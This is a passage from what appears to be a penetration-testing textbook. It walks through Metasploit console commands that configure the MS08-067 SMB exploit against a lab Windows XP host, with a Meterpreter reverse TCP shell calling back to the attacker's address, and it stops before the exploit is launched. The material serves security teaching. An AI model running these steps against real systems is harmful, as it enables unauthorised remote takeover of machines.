66
Chapter 5
identified as possibly Windows 2003, but the system is missing key ports that
would be associated with the Server Edition.) We’ll assume that our target is
running the English version of XP.
Let’s walk through the actual exploitation. First the setup:
msf >
search ms08_067_netapi
[*] Searching loaded modules for pattern 'ms08_067_netapi'...
Exploits
========
Name Rank Description
---- ---- -----------
windows/smb/ms08_067_netapi great Microsoft Server Service Relative Path Stack
Corruption
msf >
use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) >
show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
6 Windows 2003 SP1 English (NO NX)
7 Windows 2003 SP1 English (NX)
8 Windows 2003 SP2 English (NO NX)
9 Windows 2003 SP2 English (NX)
. . . SNIP . . .
26 Windows XP SP2 Japanese (NX)
. . . SNIP . . .
msf exploit(ms08_067_netapi) >
set TARGET 3
target => 3
msf exploit(ms08_067_netapi) >
set RHOST 192.168.33.130
RHOST => 192.168.33.130
msf exploit(ms08_067_netapi) >
set LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(ms08_067_netapi) >
set LPORT 8080
LPORT => 8080
msf exploit(ms08_067_netapi) >
show options